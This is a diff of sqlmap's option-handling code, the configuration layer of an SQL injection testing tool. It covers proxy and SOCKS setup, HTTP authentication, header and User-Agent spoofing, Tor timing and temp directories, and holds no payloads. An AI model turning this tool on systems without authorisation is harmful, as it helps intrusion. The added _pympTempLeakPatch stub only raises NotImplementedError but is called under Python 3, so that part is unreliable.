logger.debug(debugMsg) + + try: + _ = _urllib.parse.urlsplit(conf.proxy) + except Exception as ex: + errMsg = "invalid proxy address '%s' ('%s')" % (conf.proxy, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) -def _setSafeUrl(): + match = re.search(r"\A([^:]*):([^:]*)@([^@]+)\Z", _.netloc) + if match: + username, password = match.group(1), match.group(2) + else: + username, password = None, None + + hostnamePort = _.netloc.rsplit('@', 1)[-1].rsplit(":", 1) + + scheme = _.scheme.upper() + hostname = hostnamePort[0] + port = None + + if len(hostnamePort) == 2: + try: + port = int(hostnamePort[1]) + except: + pass # drops into the next check block + + if not all((scheme, hasattr(PROXY_TYPE, scheme), hostname, port)): + errMsg = "proxy value must be in format '(%s)://address:port'" % "|".join(_[0].lower() for _ in getPublicTypeMembers(PROXY_TYPE)) + raise SqlmapSyntaxException(errMsg) + + if conf.proxyCred: + _ = re.search(r"\A(.*?):(.*?)\Z", conf.proxyCred) + if not _: + errMsg = "proxy authentication credentials " + errMsg += "value must be in format username:password" + raise SqlmapSyntaxException(errMsg) + else: + username = _.group(1) + password = _.group(2) + + if scheme in (PROXY_TYPE.SOCKS4, PROXY_TYPE.SOCKS5): + proxyHandler.proxies = {} + + if scheme == PROXY_TYPE.SOCKS4: + warnMsg = "SOCKS4 does not support resolving (DNS) names (i.e. 
causing DNS leakage)" + singleTimeWarnMessage(warnMsg) + + socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if scheme == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, hostname, port, username=username, password=password) + socks.wrapmodule(_http_client) + else: + socks.unwrapmodule(_http_client) + + if conf.proxyCred: + # Reference: http://stackoverflow.com/questions/34079/how-to-specify-an-authenticated-proxy-for-a-python-http-connection + proxyString = "%s@" % conf.proxyCred + else: + proxyString = "" + + proxyString += "%s:%d" % (hostname, port) + proxyHandler.proxies = kb.proxies = {"http": proxyString, "https": proxyString} + + proxyHandler.__init__(proxyHandler.proxies) + + if not proxyHandler.proxies: + for _ in ("http", "https"): + if hasattr(proxyHandler, "%s_open" % _): + delattr(proxyHandler, "%s_open" % _) + + debugMsg = "creating HTTP requests opener object" + logger.debug(debugMsg) + + handlers = filterNone([multipartPostHandler, proxyHandler if proxyHandler.proxies else None, authHandler, redirectHandler, rangeHandler, chunkedHandler if conf.chunked else None, httpsHandler]) + + if not conf.dropSetCookie: + if not conf.loadCookies: + conf.cj = _http_cookiejar.CookieJar() + else: + conf.cj = _http_cookiejar.MozillaCookieJar() + resetCookieJar(conf.cj) + + handlers.append(_urllib.request.HTTPCookieProcessor(conf.cj)) + + # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec8.html + if conf.keepAlive: + warnMsg = "persistent HTTP(s) connections, Keep-Alive, has " + warnMsg += "been disabled because of its incompatibility " + + if conf.proxy: + warnMsg += "with HTTP(s) proxy" + logger.warning(warnMsg) + elif conf.authType: + warnMsg += "with authentication methods" + logger.warning(warnMsg) + else: + handlers.append(keepAliveHandler) + + opener = _urllib.request.build_opener(*handlers) + opener.addheaders = [] # Note: clearing default "User-Agent: Python-urllib/X.Y" + _urllib.request.install_opener(opener) + +def _setSafeVisit(): """ - Check and set the safe URL options. + Check and set the safe visit options. 
""" - if not conf.safUrl: + if not any((conf.safeUrl, conf.safeReqFile)): return - if not re.search("^http[s]*://", conf.safUrl): - if ":443/" in conf.safUrl: - conf.safUrl = "https://" + conf.safUrl + if conf.safeReqFile: + checkFile(conf.safeReqFile) + + raw = readCachedFileContent(conf.safeReqFile) + match = re.search(r"\A([A-Z]+) ([^ ]+) HTTP/[0-9.]+\Z", raw.split('\n')[0].strip()) + + if match: + kb.safeReq.method = match.group(1) + kb.safeReq.url = match.group(2) + kb.safeReq.headers = {} + + for line in raw.split('\n')[1:]: + line = line.strip() + if line and ':' in line: + key, value = line.split(':', 1) + value = value.strip() + kb.safeReq.headers[key] = value + if key.upper() == HTTP_HEADER.HOST.upper(): + if not value.startswith("http"): + scheme = "http" + if value.endswith(":443"): + scheme = "https" + value = "%s://%s" % (scheme, value) + kb.safeReq.url = _urllib.parse.urljoin(value, kb.safeReq.url) + else: + break + + post = None + + if '\r\n\r\n' in raw: + post = raw[raw.find('\r\n\r\n') + 4:] + elif '\n\n' in raw: + post = raw[raw.find('\n\n') + 2:] + + if post and post.strip(): + kb.safeReq.post = post + else: + kb.safeReq.post = None else: - conf.safUrl = "http://" + conf.safUrl + errMsg = "invalid format of a safe request file" + raise SqlmapSyntaxException(errMsg) + else: + if not re.search(r"(?i)\Ahttp[s]*://", conf.safeUrl): + if ":443/" in conf.safeUrl: + conf.safeUrl = "https://%s" % conf.safeUrl + else: + conf.safeUrl = "http://%s" % conf.safeUrl - if conf.saFreq <= 0: - errMsg = "please provide a valid value (>0) for safe frequency (--safe-freq) while using safe url feature" + if (conf.safeFreq or 0) <= 0: + errMsg = "please provide a valid value (>0) for safe frequency ('--safe-freq') while using safe visit features" raise SqlmapSyntaxException(errMsg) def _setPrefixSuffix(): @@ -1024,51 +1347,62 @@ def _setAuthCred(): (used by connection handler) """ - if kb.passwordMgr: - kb.passwordMgr.add_password(None, "%s://%s" % (conf.scheme, conf.hostname), conf.authUsername, conf.authPassword) + if kb.passwordMgr and all(_ is not None for _ in (conf.scheme, conf.hostname, conf.port, conf.authUsername, conf.authPassword)): + kb.passwordMgr.add_password(None, "%s://%s:%d" % (conf.scheme, conf.hostname, conf.port), conf.authUsername, conf.authPassword) def _setHTTPAuthentication(): """ - Check and set the HTTP(s) authentication method (Basic, Digest, NTLM or Certificate), - username and password for first three methods, or key file and certification file for - certificate authentication + Check and set the HTTP(s) authentication method (Basic, Digest, Bearer, NTLM or PKI), + username and password for first three methods, or PEM private key file for + PKI authentication """ global authHandler - if not conf.aType and not conf.aCred and not conf.aCert: + if not conf.authType and not conf.authCred and not conf.authFile: return - elif conf.aType and not conf.aCred: + if conf.authFile and not conf.authType: + conf.authType = AUTH_TYPE.PKI + + elif conf.authType and not conf.authCred and not conf.authFile: errMsg = "you specified the HTTP authentication type, but " errMsg += "did not provide the credentials" raise SqlmapSyntaxException(errMsg) - elif not conf.aType and conf.aCred: + elif not conf.authType and conf.authCred: errMsg = "you specified the HTTP authentication credentials, " - errMsg += "but did not provide the type" + errMsg += "but did not provide the type (e.g. 
--auth-type=\"basic\")" raise SqlmapSyntaxException(errMsg) - if not conf.aCert: + elif (conf.authType or "").lower() not in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST, AUTH_TYPE.BEARER, AUTH_TYPE.NTLM, AUTH_TYPE.PKI): + errMsg = "HTTP authentication type value must be " + errMsg += "Basic, Digest, Bearer, NTLM or PKI" + raise SqlmapSyntaxException(errMsg) + + if not conf.authFile: debugMsg = "setting the HTTP authentication type and credentials" logger.debug(debugMsg) - aTypeLower = conf.aType.lower() + authType = conf.authType.lower() - if aTypeLower not in ("basic", "digest", "ntlm"): - errMsg = "HTTP authentication type value must be " - errMsg += "Basic, Digest or NTLM" - raise SqlmapSyntaxException(errMsg) - elif aTypeLower in ("basic", "digest"): + if authType in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST): regExp = "^(.*?):(.*?)$" - errMsg = "HTTP %s authentication credentials " % aTypeLower - errMsg += "value must be in format username:password" - elif aTypeLower == "ntlm": + errMsg = "HTTP %s authentication credentials " % authType + errMsg += "value must be in format 'username:password'" + elif authType == AUTH_TYPE.BEARER: + conf.httpHeaders.append((HTTP_HEADER.AUTHORIZATION, "Bearer %s" % conf.authCred.strip())) + return + elif authType == AUTH_TYPE.NTLM: regExp = "^(.*\\\\.*):(.*?)$" errMsg = "HTTP NTLM authentication credentials value must " - errMsg += "be in format DOMAIN\username:password" + errMsg += "be in format 'DOMAIN\\username:password'" + elif authType == AUTH_TYPE.PKI: + errMsg = "HTTP PKI authentication require " + errMsg += "usage of option `--auth-file`" + raise SqlmapSyntaxException(errMsg) - aCredRegExp = re.search(regExp, conf.aCred) + aCredRegExp = re.search(regExp, conf.authCred) if not aCredRegExp: raise SqlmapSyntaxException(errMsg) @@ -1076,101 +1410,67 @@ def _setHTTPAuthentication(): conf.authUsername = aCredRegExp.group(1) conf.authPassword = aCredRegExp.group(2) - kb.passwordMgr = urllib2.HTTPPasswordMgrWithDefaultRealm() + kb.passwordMgr = _urllib.request.HTTPPasswordMgrWithDefaultRealm() _setAuthCred() - if aTypeLower == "basic": + if authType == AUTH_TYPE.BASIC: authHandler = SmartHTTPBasicAuthHandler(kb.passwordMgr) - elif aTypeLower == "digest": - authHandler = urllib2.HTTPDigestAuthHandler(kb.passwordMgr) + elif authType == AUTH_TYPE.DIGEST: + authHandler = _urllib.request.HTTPDigestAuthHandler(kb.passwordMgr) - elif aTypeLower == "ntlm": + elif authType == AUTH_TYPE.NTLM: try: from ntlm import HTTPNtlmAuthHandler except ImportError: errMsg = "sqlmap requires Python NTLM third-party library " - errMsg += "in order to authenticate via NTLM, " - errMsg += "http://code.google.com/p/python-ntlm/" + errMsg += "in order to authenticate via NTLM. 
Download from " + errMsg += "'https://github.com/mullender/python-ntlm'" raise SqlmapMissingDependence(errMsg) authHandler = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(kb.passwordMgr) else: - debugMsg = "setting the HTTP(s) authentication certificate" + debugMsg = "setting the HTTP(s) authentication PEM private key" logger.debug(debugMsg) - aCertRegExp = re.search("^(.+?),\s*(.+?)$", conf.aCert) - - if not aCertRegExp: - errMsg = "HTTP authentication certificate option " - errMsg += "must be in format key_file,cert_file" - raise SqlmapSyntaxException(errMsg) - - # os.path.expanduser for support of paths with ~ - key_file = os.path.expanduser(aCertRegExp.group(1)) - cert_file = os.path.expanduser(aCertRegExp.group(2)) - - for ifile in (key_file, cert_file): - if not os.path.exists(ifile): - errMsg = "File '%s' does not exist" % ifile - raise SqlmapSyntaxException(errMsg) - - authHandler = HTTPSCertAuthHandler(key_file, cert_file) - -def _setHTTPMethod(): - """ - Check and set the HTTP method to perform HTTP requests through. - """ - - conf.method = HTTPMETHOD.POST if conf.data is not None else HTTPMETHOD.GET - - debugMsg = "setting the HTTP method to %s" % conf.method - logger.debug(debugMsg) + _ = safeExpandUser(conf.authFile) + checkFile(_) + authHandler = HTTPSPKIAuthHandler(_) def _setHTTPExtraHeaders(): if conf.headers: debugMsg = "setting extra HTTP headers" logger.debug(debugMsg) - conf.headers = conf.headers.split("\n") if "\n" in conf.headers else conf.headers.split("\\n") + if "\\n" in conf.headers: + conf.headers = conf.headers.replace("\\r\\n", "\\n").split("\\n") + else: + conf.headers = conf.headers.replace("\r\n", "\n").split("\n") for headerValue in conf.headers: - if headerValue.count(':') == 1: - header, value = (_.lstrip() for _ in headerValue.split(":")) + if not headerValue.strip(): + continue + + if headerValue.count(':') >= 1: + header, value = (_.lstrip() for _ in headerValue.split(":", 1)) if header and value: conf.httpHeaders.append((header, value)) + elif headerValue.startswith('@'): + checkFile(headerValue[1:]) + kb.headersFile = headerValue[1:] else: errMsg = "invalid header value: %s. 
Valid header format is 'name:value'" % repr(headerValue).lstrip('u') raise SqlmapSyntaxException(errMsg) - elif not conf.httpHeaders or len(conf.httpHeaders) == 1: - conf.httpHeaders.append((HTTPHEADER.ACCEPT_LANGUAGE, "en-us,en;q=0.5")) - if not conf.charset: - conf.httpHeaders.append((HTTPHEADER.ACCEPT_CHARSET, "ISO-8859-15,utf-8;q=0.7,*;q=0.7")) - else: - conf.httpHeaders.append((HTTPHEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.charset)) + elif not conf.requestFile and len(conf.httpHeaders or []) < 2: + if conf.encoding: + conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.encoding)) # Invalidating any caching mechanism in between - # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html - conf.httpHeaders.append((HTTPHEADER.CACHE_CONTROL, "no-cache,no-store")) - conf.httpHeaders.append((HTTPHEADER.PRAGMA, "no-cache")) - -def _defaultHTTPUserAgent(): - """ - @return: default sqlmap HTTP User-Agent header - @rtype: C{str} - """ - - return "%s (%s)" % (VERSION_STRING, SITE) - - # Firefox 3 running on Ubuntu 9.04 updated at April 2009 - #return "Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9" - - # Internet Explorer 7.0 running on Windows 2003 Service Pack 2 english - # updated at March 2009 - #return "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" + # Reference: http://stackoverflow.com/a/1383359 + conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, "no-cache")) def _setHTTPUserAgent(): """ @@ -1183,71 +1483,54 @@ def _setHTTPUserAgent(): file choosed as user option """ + debugMsg = "setting the HTTP User-Agent header" + logger.debug(debugMsg) + if conf.mobile: - message = "which smartphone do you want sqlmap to imitate " - message += "through HTTP User-Agent header?\n" - items = sorted(getPublicTypeMembers(MOBILES, True)) + if conf.randomAgent: + _ = random.sample([_[1] for _ in getPublicTypeMembers(MOBILES, True)], 1)[0] + conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, _)) + else: + message = "which smartphone do you want sqlmap to imitate " + message += "through HTTP User-Agent header?\n" + items = sorted(getPublicTypeMembers(MOBILES, True)) - for count in xrange(len(items)): - item = items[count] - message += "[%d] %s%s\n" % (count + 1, item[0], " (default)" if item == MOBILES.IPHONE else "") + for count in xrange(len(items)): + item = items[count] + message += "[%d] %s%s\n" % (count + 1, item[0], " (default)" if item == MOBILES.IPHONE else "") - test = readInput(message.rstrip('\n'), default=items.index(MOBILES.IPHONE) + 1) + test = readInput(message.rstrip('\n'), default=items.index(MOBILES.IPHONE) + 1) - try: - item = items[int(test) - 1] - except: - item = MOBILES.IPHONE + try: + item = items[int(test) - 1] + except: + item = MOBILES.IPHONE - conf.httpHeaders.append((HTTPHEADER.USER_AGENT, item[1])) + conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, item[1])) elif conf.agent: - debugMsg = "setting the HTTP User-Agent header" - logger.debug(debugMsg) - - conf.httpHeaders.append((HTTPHEADER.USER_AGENT, conf.agent)) + conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, conf.agent)) elif not conf.randomAgent: _ = True for header, _ in conf.httpHeaders: - if header == HTTPHEADER.USER_AGENT: + if header.upper() == HTTP_HEADER.USER_AGENT.upper(): _ = False break if _: - conf.httpHeaders.append((HTTPHEADER.USER_AGENT, _defaultHTTPUserAgent())) + 
conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, DEFAULT_USER_AGENT)) else: - if not kb.userAgents: - debugMsg = "loading random HTTP User-Agent header(s) from " - debugMsg += "file '%s'" % paths.USER_AGENTS - logger.debug(debugMsg) - - try: - kb.userAgents = getFileItems(paths.USER_AGENTS) - except IOError: - warnMsg = "unable to read HTTP User-Agent header " - warnMsg += "file '%s'" % paths.USER_AGENTS - logger.warn(warnMsg) - - conf.httpHeaders.append((HTTPHEADER.USER_AGENT, _defaultHTTPUserAgent())) - return - - count = len(kb.userAgents) + userAgent = fetchRandomAgent() - if count == 1: - userAgent = kb.userAgents[0] - else: - userAgent = kb.userAgents[randomRange(stop=count - 1)] - - userAgent = sanitizeStr(userAgent) - conf.httpHeaders.append((HTTPHEADER.USER_AGENT, userAgent)) - - infoMsg = "fetched random HTTP User-Agent header from " - infoMsg += "file '%s': %s" % (paths.USER_AGENTS, userAgent) + infoMsg = "fetched random HTTP User-Agent header value '%s' from " % userAgent + infoMsg += "file '%s'" % paths.USER_AGENTS logger.info(infoMsg) + conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, userAgent)) + def _setHTTPReferer(): """ Set the HTTP Referer @@ -1257,7 +1540,18 @@ def _setHTTPReferer(): debugMsg = "setting the HTTP Referer header" logger.debug(debugMsg) - conf.httpHeaders.append((HTTPHEADER.REFERER, conf.referer)) + conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.referer)) + +def _setHTTPHost(): + """ + Set the HTTP Host + """ + + if conf.host: + debugMsg = "setting the HTTP Host header" + logger.debug(debugMsg) + + conf.httpHeaders.append((HTTP_HEADER.HOST, conf.host)) def _setHTTPCookies(): """ @@ -1268,43 +1562,155 @@ def _setHTTPCookies(): debugMsg = "setting the HTTP Cookie header" logger.debug(debugMsg) - conf.httpHeaders.append((HTTPHEADER.COOKIE, conf.cookie)) + conf.httpHeaders.append((HTTP_HEADER.COOKIE, conf.cookie)) + +def _setHostname(): + """ + Set value conf.hostname + """ + + if conf.url: + try: + conf.hostname = _urllib.parse.urlsplit(conf.url).netloc.split(':')[0] + except ValueError as ex: + errMsg = "problem occurred while " + errMsg += "parsing an URL '%s' ('%s')" % (conf.url, getSafeExString(ex)) + raise SqlmapDataException(errMsg) def _setHTTPTimeout(): """ Set the HTTP timeout """ - if conf.timeout: - debugMsg = "setting the HTTP timeout" - logger.debug(debugMsg) + if conf.timeout: + debugMsg = "setting the HTTP timeout" + logger.debug(debugMsg) + + conf.timeout = float(conf.timeout) + + if conf.timeout < 3.0: + warnMsg = "the minimum HTTP timeout is 3 seconds, sqlmap " + warnMsg += "will going to reset it" + logger.warning(warnMsg) + + conf.timeout = 3.0 + else: + conf.timeout = 30.0 + + try: + socket.setdefaulttimeout(conf.timeout) + except OverflowError as ex: + raise SqlmapValueException("invalid value used for option '--timeout' ('%s')" % getSafeExString(ex)) + +def _checkDependencies(): + """ + Checks for missing dependencies. 
+ """ + + if conf.dependencies: + checkDependencies() + +def _createHomeDirectories(): + """ + Creates directories inside sqlmap's home directory + """ + + if conf.get("purge"): + return + + for context in ("output", "history"): + directory = paths["SQLMAP_%s_PATH" % getUnicode(context).upper()] # NOTE: https://github.com/sqlmapproject/sqlmap/issues/4363 + try: + if not os.path.isdir(directory): + os.makedirs(directory) + + _ = os.path.join(directory, randomStr()) + open(_, "w+").close() + os.remove(_) + + if conf.get("outputDir") and context == "output": + warnMsg = "using '%s' as the %s directory" % (directory, context) + logger.warning(warnMsg) + except (OSError, IOError) as ex: + tempDir = tempfile.mkdtemp(prefix="sqlmap%s" % context) + warnMsg = "unable to %s %s directory " % ("create" if not os.path.isdir(directory) else "write to the", context) + warnMsg += "'%s' (%s). " % (directory, getUnicode(ex)) + warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) + logger.warning(warnMsg) + + paths["SQLMAP_%s_PATH" % context.upper()] = tempDir + +def _pympTempLeakPatch(tempDir): # Cross-referenced function + raise NotImplementedError + +def _createTemporaryDirectory(): + """ + Creates temporary directory for this run. + """ + + if conf.tmpDir: + try: + if not os.path.isdir(conf.tmpDir): + os.makedirs(conf.tmpDir) + + _ = os.path.join(conf.tmpDir, randomStr()) - conf.timeout = float(conf.timeout) + open(_, "w+").close() + os.remove(_) - if conf.timeout < 3.0: - warnMsg = "the minimum HTTP timeout is 3 seconds, sqlmap " - warnMsg += "will going to reset it" - logger.warn(warnMsg) + tempfile.tempdir = conf.tmpDir - conf.timeout = 3.0 + warnMsg = "using '%s' as the temporary directory" % conf.tmpDir + logger.warning(warnMsg) + except (OSError, IOError) as ex: + errMsg = "there has been a problem while accessing " + errMsg += "temporary directory location(s) ('%s')" % getSafeExString(ex) + raise SqlmapSystemException(errMsg) else: - conf.timeout = 30.0 + try: + if not os.path.isdir(tempfile.gettempdir()): + os.makedirs(tempfile.gettempdir()) + except Exception as ex: + warnMsg = "there has been a problem while accessing " + warnMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex) + warnMsg += "make sure that there is enough disk space left. If problem persists, " + warnMsg += "try to set environment variable 'TEMP' to a location " + warnMsg += "writeable by the current user" + logger.warning(warnMsg) + + if "sqlmap" not in (tempfile.tempdir or "") or conf.tmpDir and tempfile.tempdir == conf.tmpDir: + try: + tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid())) + except: + tempfile.tempdir = os.path.join(paths.SQLMAP_HOME_PATH, "tmp", "sqlmap%s%d" % (randomStr(6), os.getpid())) - socket.setdefaulttimeout(conf.timeout) + kb.tempDir = tempfile.tempdir -def _checkDependencies(): - """ - Checks for missing dependencies. - """ + if not os.path.isdir(tempfile.tempdir): + try: + os.makedirs(tempfile.tempdir) + except Exception as ex: + errMsg = "there has been a problem while setting " + errMsg += "temporary directory location ('%s')" % getSafeExString(ex) + raise SqlmapSystemException(errMsg) - if conf.dependencies: - checkDependencies() + conf.tempDirs.append(tempfile.tempdir) + + if six.PY3: + _pympTempLeakPatch(kb.tempDir) def _cleanupOptions(): """ Cleanup configuration attributes. 
""" + if conf.encoding: + try: + codecs.lookup(conf.encoding) + except LookupError: + errMsg = "unknown encoding '%s'" % conf.encoding + raise SqlmapValueException(errMsg) + debugMsg = "cleaning up configuration parameters" logger.debug(debugMsg) @@ -1315,39 +1721,101 @@ def _cleanupOptions(): else: conf.progressWidth = width - 46 + for key, value in conf.items(): + if value and any(key.endswith(_) for _ in ("Path", "File", "Dir")): + if isinstance(value, str): + conf[key] = safeExpandUser(value) + if conf.testParameter: conf.testParameter = urldecode(conf.testParameter) - conf.testParameter = conf.testParameter.replace(" ", "") - conf.testParameter = re.split(PARAMETER_SPLITTING_REGEX, conf.testParameter) + conf.testParameter = [_.strip() for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.testParameter)] else: conf.testParameter = [] + if conf.ignoreCode: + if conf.ignoreCode == IGNORE_CODE_WILDCARD: + conf.ignoreCode = xrange(0, 1000) + else: + try: + conf.ignoreCode = [int(_) for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.ignoreCode)] + except ValueError: + errMsg = "option '--ignore-code' should contain a list of integer values or a wildcard value '%s'" % IGNORE_CODE_WILDCARD + raise SqlmapSyntaxException(errMsg) + else: + conf.ignoreCode = [] + + if conf.abortCode: + try: + conf.abortCode = [int(_) for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.abortCode)] + except ValueError: + errMsg = "option '--abort-code' should contain a list of integer values" + raise SqlmapSyntaxException(errMsg) + else: + conf.abortCode = [] + + if conf.paramFilter: + conf.paramFilter = [_.strip() for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.paramFilter.upper())] + else: + conf.paramFilter = [] + + if conf.base64Parameter: + conf.base64Parameter = urldecode(conf.base64Parameter) + conf.base64Parameter = conf.base64Parameter.strip() + conf.base64Parameter = re.split(PARAMETER_SPLITTING_REGEX, conf.base64Parameter) + else: + conf.base64Parameter = [] + + if conf.agent: + conf.agent = re.sub(r"[\r\n]", "", conf.agent) + if conf.user: conf.user = conf.user.replace(" ", "") if conf.rParam: - conf.rParam = conf.rParam.replace(" ", "") - conf.rParam = re.split(PARAMETER_SPLITTING_REGEX, conf.rParam) + if all(_ in conf.rParam for _ in ('=', ',')): + original = conf.rParam + conf.rParam = [] + for part in original.split(';'): + if '=' in part: + left, right = part.split('=', 1) + conf.rParam.append(left) + kb.randomPool[left] = filterNone(_.strip() for _ in right.split(',')) + else: + conf.rParam.append(part) + else: + conf.rParam = conf.rParam.replace(" ", "") + conf.rParam = re.split(PARAMETER_SPLITTING_REGEX, conf.rParam) else: conf.rParam = [] + if conf.paramDel: + conf.paramDel = decodeStringEscape(conf.paramDel) + if conf.skip: conf.skip = conf.skip.replace(" ", "") conf.skip = re.split(PARAMETER_SPLITTING_REGEX, conf.skip) else: conf.skip = [] + if conf.cookie: + conf.cookie = re.sub(r"[\r\n]", "", conf.cookie) + if conf.delay: conf.delay = float(conf.delay) - if conf.rFile: - conf.rFile = ntToPosixSlashes(normalizePath(conf.rFile)) + if conf.url: + conf.url = conf.url.strip().lstrip('/') + if not re.search(r"\A\w+://", conf.url): + conf.url = "http://%s" % conf.url + + if conf.fileRead: + conf.fileRead = ntToPosixSlashes(normalizePath(conf.fileRead)) - if conf.wFile: - conf.wFile = ntToPosixSlashes(normalizePath(conf.wFile)) + if conf.fileWrite: + conf.fileWrite = ntToPosixSlashes(normalizePath(conf.fileWrite)) - if conf.dFile: - conf.dFile = ntToPosixSlashes(normalizePath(conf.dFile)) + if 
conf.fileDest: + conf.fileDest = ntToPosixSlashes(normalizePath(conf.fileDest)) if conf.msfPath: conf.msfPath = ntToPosixSlashes(normalizePath(conf.msfPath)) @@ -1355,29 +1823,66 @@ def _cleanupOptions(): if conf.tmpPath: conf.tmpPath = ntToPosixSlashes(normalizePath(conf.tmpPath)) - if conf.googleDork or conf.logFile or conf.bulkFile or conf.forms or conf.crawlDepth: + if any((conf.googleDork, conf.logFile, conf.bulkFile, conf.forms, conf.crawlDepth, conf.stdinPipe)): conf.multipleTargets = True if conf.optimize: setOptimize() - if conf.data: - conf.data = re.sub(INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.data, re.I) - - if conf.url: - conf.url = re.sub(INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.url, re.I) - if conf.os: conf.os = conf.os.capitalize() + if conf.forceDbms: + conf.dbms = conf.forceDbms + if conf.dbms: - conf.dbms = conf.dbms.capitalize() + kb.dbmsFilter = [] + for _ in conf.dbms.split(','): + for dbms, aliases in DBMS_ALIASES: + if _.strip().lower() in aliases: + kb.dbmsFilter.append(dbms) + conf.dbms = dbms if conf.dbms and ',' not in conf.dbms else None + break + + if conf.uValues: + conf.uCols = "%d-%d" % (1 + conf.uValues.count(','), 1 + conf.uValues.count(',')) if conf.testFilter: - if not any([char in conf.testFilter for char in ('.', ')', '(', ']', '[')]): - conf.testFilter = conf.testFilter.replace('*', '.*') + conf.testFilter = conf.testFilter.strip('*+') + conf.testFilter = re.sub(r"([^.])([*+])", r"\g<1>.\g<2>", conf.testFilter) + + try: + re.compile(conf.testFilter) + except re.error: + conf.testFilter = re.escape(conf.testFilter) + + if conf.csrfToken: + original = conf.csrfToken + try: + re.compile(conf.csrfToken) + + if re.escape(conf.csrfToken) != conf.csrfToken: + message = "provided value for option '--csrf-token' is a regular expression? [y/N] " + if not readInput(message, default='N', boolean=True): + conf.csrfToken = re.escape(conf.csrfToken) + except re.error: + conf.csrfToken = re.escape(conf.csrfToken) + finally: + class _(six.text_type): + pass + conf.csrfToken = _(conf.csrfToken) + conf.csrfToken._original = original + + if conf.testSkip: + conf.testSkip = conf.testSkip.strip('*+') + conf.testSkip = re.sub(r"([^.])([*+])", r"\g<1>.\g<2>", conf.testSkip) + + try: + re.compile(conf.testSkip) + except re.error: + conf.testSkip = re.escape(conf.testSkip) - if conf.timeSec not in kb.explicitSettings: + if "timeSec" not in kb.explicitSettings: if conf.tor: conf.timeSec = 2 * conf.timeSec kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE @@ -1385,40 +1890,47 @@ def _cleanupOptions(): warnMsg = "increasing default value for " warnMsg += "option '--time-sec' to %d because " % conf.timeSec warnMsg += "switch '--tor' was provided" - logger.warn(warnMsg) + logger.warning(warnMsg) else: kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE + if conf.retries: + conf.retries = min(conf.retries, MAX_CONNECT_RETRIES) + + if conf.url: + match = re.search(r"\A(\w+://)?([^/@?]+)@", conf.url) + if match: + credentials = match.group(2) + conf.url = conf.url.replace("%s@" % credentials, "", 1) + + conf.authType = AUTH_TYPE.BASIC + conf.authCred = credentials if ':' in credentials else "%s:" % credentials + if conf.code: conf.code = int(conf.code) if conf.csvDel: - conf.csvDel = conf.csvDel.decode("string_escape") # e.g. 
'\\t' -> '\t' + conf.csvDel = decodeStringEscape(conf.csvDel) - if conf.torPort and conf.torPort.isdigit(): + if conf.torPort and hasattr(conf.torPort, "isdigit") and conf.torPort.isdigit(): conf.torPort = int(conf.torPort) if conf.torType: conf.torType = conf.torType.upper() - if conf.oDir: - paths.SQLMAP_OUTPUT_PATH = conf.oDir - setPaths() + if conf.outputDir: + paths.SQLMAP_OUTPUT_PATH = os.path.realpath(os.path.expanduser(conf.outputDir)) + setPaths(paths.SQLMAP_ROOT_PATH) if conf.string: - try: - conf.string = conf.string.decode("unicode_escape") - except: - charset = string.whitespace.replace(" ", "") - for _ in charset: - conf.string = conf.string.replace(_.encode("string_escape"), _) + conf.string = decodeStringEscape(conf.string) if conf.getAll: - map(lambda x: conf.__setitem__(x, True), WIZARD.ALL) + for _ in WIZARD.ALL: + conf.__setitem__(_, True) if conf.noCast: - for _ in DUMP_REPLACEMENTS.keys(): - del DUMP_REPLACEMENTS[_] + DUMP_REPLACEMENTS.clear() if conf.dumpFormat: conf.dumpFormat = conf.dumpFormat.upper() @@ -1426,16 +1938,71 @@ def _cleanupOptions(): if conf.torType: conf.torType = conf.torType.upper() + if conf.col: + conf.col = re.sub(r"\s*,\s*", ',', conf.col) + + if conf.exclude: + regex = False + original = conf.exclude + + if any(_ in conf.exclude for _ in ('+', '*')): + try: + re.compile(conf.exclude) + except re.error: + pass + else: + regex = True + + if not regex: + conf.exclude = re.sub(r"\s*,\s*", ',', conf.exclude) + conf.exclude = r"\A%s\Z" % '|'.join(re.escape(_) for _ in conf.exclude.split(',')) + else: + conf.exclude = re.sub(r"(\w+)\$", r"\g<1>\$", conf.exclude) + + class _(six.text_type): + pass + + conf.exclude = _(conf.exclude) + conf.exclude._original = original + + if conf.binaryFields: + conf.binaryFields = conf.binaryFields.replace(" ", "") + conf.binaryFields = re.split(PARAMETER_SPLITTING_REGEX, conf.binaryFields) + + envProxy = max(os.environ.get(_, "") for _ in PROXY_ENVIRONMENT_VARIABLES) + if re.search(r"\A(https?|socks[45])://.+:\d+\Z", envProxy) and 